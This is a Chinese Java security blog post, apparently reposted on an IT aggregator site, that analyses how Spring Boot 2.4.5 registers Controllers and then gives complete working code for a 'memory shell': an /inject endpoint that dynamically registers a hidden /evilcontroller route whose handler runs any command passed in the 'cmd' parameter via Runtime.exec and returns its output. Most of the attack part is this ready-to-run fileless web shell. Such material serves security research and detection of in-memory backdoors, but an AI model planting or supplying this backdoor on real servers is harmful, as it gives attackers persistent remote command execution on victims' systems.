IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Java知识库 -> 『Java安全』Java Spring内存马_动态注册Controller内存马 -> 正文阅读

[Java知识库]『Java安全』Java Spring内存马_动态注册Controller内存马

前言

SpringBoot版本2.4.5

    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.4.5</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>

Controller注册分析

InitializingBean的afterPropertiesSet方法用于bean初始化

RequestMappingHandlerMapping用于处理Controller里面带有地址映射@RequestMapping的方法

RequestMappingHandlerMapping.afterPropertiesSet()处理完config后调用父类AbstractHandlerMethodMapping的afterPropertiesSet方法
在这里插入图片描述
来到AbstractHandlerMethodMapping.initHandlerMethod(),获取所有的bean然后依次传入processCandidateBean处理每个bean,Controller也在此处理
在这里插入图片描述
当处理Controller时:首先获取类型,然后调用isHandler类型判断
在这里插入图片描述
如果bean拥有Controller或RequestMapping注解,就通过判断,进入detectHandlerMethods(),这里是我们自定义的Controller自然有注解
在这里插入图片描述
获取Controller所有方法,如果方法有RequestMapping注解就调用RequestMappingHandlerMapping.getMappingForMethod()创建RequestMappingInfo
在这里插入图片描述
全部方法处理完后调用registerHandlerMethod()建立方法到RequestMappingInfo的映射,也就是完成Controller的注册,具体调用的是AbstractHandlerMethodMapping.register()
在这里插入图片描述

register()

重点看一下register方法的传参:

mapping是RequestMappingInfo类,存储方法的映射URL路径
在这里插入图片描述
handler是自定义Controller对象
在这里插入图片描述
method是反射获取的方法
在这里插入图片描述

Controller内存马

原理

Ⅰ. 获取RequestMappingHandlerMapping

首先要获取Mapping实例,前面提到过它是一个bean,存储在context里面,所以要先获取Spring的上下文

WebApplicationContext context = ContextLoader.getCurrentWebApplicationContext();
?
WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());
?
WebApplicationContextWebApplicationContext context = RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
?
getAttribute()直接获得ServletContext通过属性Context拿到WebApplicationContext

拿到的上下文是WebApplicationContext类,它继承了BeanFactory所以可以用getBean获取RequestMappingHandlerMapping
在这里插入图片描述

WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

Ⅱ. 生成RequestMappingInfo

有一个已经弃用的方法,而且根据上面的流程分析只需要传入这两个参数:

  • PatternsRequestCondition:Controller映射的URL
  • RequestCondition:定义允许GET/POST方法

在这里插入图片描述

PatternsRequestCondition url = new PatternsRequestCondition("/evilcontroller");
?
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
?
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);

Ⅲ. 写恶意Controller

@RestController注解缺失会导致500错误、无回显

	@RestController
	public class InjectedController {
        public InjectedController(){
        }
        public String cmd() throws Exception {
            HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();

            InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            InputStreamReader isr = new InputStreamReader(is, "UTF-8");
            BufferedReader br = new BufferedReader(isr);
            String str = "";
            String line;

            while ((line = br.readLine())!=null){
                str += line;
            }
            is.close();
            br.close();

            return str;
        }
    }

Ⅳ. 反射获取恶意方法

Method method = InjectedController.class.getMethod("cmd");

Ⅴ. 向RequestMappingHandlerMapping注册

RequestMappingHandlerMapping类有一个registerMapping,它是public的,调用它注册
在这里插入图片描述

requestMappingHandlerMapping.registerMapping(info, injectedController, method);

代码

package com.example.javaspring;

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Method;

@RestController
public class InjectEvilController {
    @RequestMapping("/inject")
    public String inject() throws Exception{
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

        RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

        Method method = InjectedController.class.getMethod("cmd");

        PatternsRequestCondition url = new PatternsRequestCondition("/evilcontroller");

        RequestMethodsRequestCondition condition = new RequestMethodsRequestCondition();

        RequestMappingInfo info = new RequestMappingInfo(url, condition, null, null, null, null, null);

        InjectedController injectedController = new InjectedController();

        requestMappingHandlerMapping.registerMapping(info, injectedController, method);

        return "Inject done";
    }

    @RestController
    public class InjectedController {
        public InjectedController(){
        }
        public String cmd() throws Exception {
            HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();

            InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            InputStreamReader isr = new InputStreamReader(is, "UTF-8");
            BufferedReader br = new BufferedReader(isr);
            String str = "";
            String line;

            while ((line = br.readLine())!=null){
                str += line;
            }
            is.close();
            br.close();

            return str;
        }
    }
}


运行截图

在这里插入图片描述
在这里插入图片描述

注意事项

不同版本spring在注册过程有不同,代码在springboot2.4.5可以运行

参考引用

https://zhuanlan.zhihu.com/p/488804407
https://javasec.org/javaweb/MemoryShell

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123943546
版权声明:本文为原创,转载时须注明出处及本声明

  Java知识库 最新文章
计算距离春节还有多长时间
系统开发系列 之WebService(spring框架+ma
springBoot+Cache(自定义有效时间配置)
SpringBoot整合mybatis实现增删改查、分页查
spring教程
SpringBoot+Vue实现美食交流网站的设计与实
虚拟机内存结构以及虚拟机中销毁和新建对象
SpringMVC---原理
小李同学: Java如何按多个字段分组
打印票据--java
上一篇文章      下一篇文章      查看所有文章
加:2022-04-04 11:57:15  更:2022-04-04 11:58:03 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 7:39:27-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码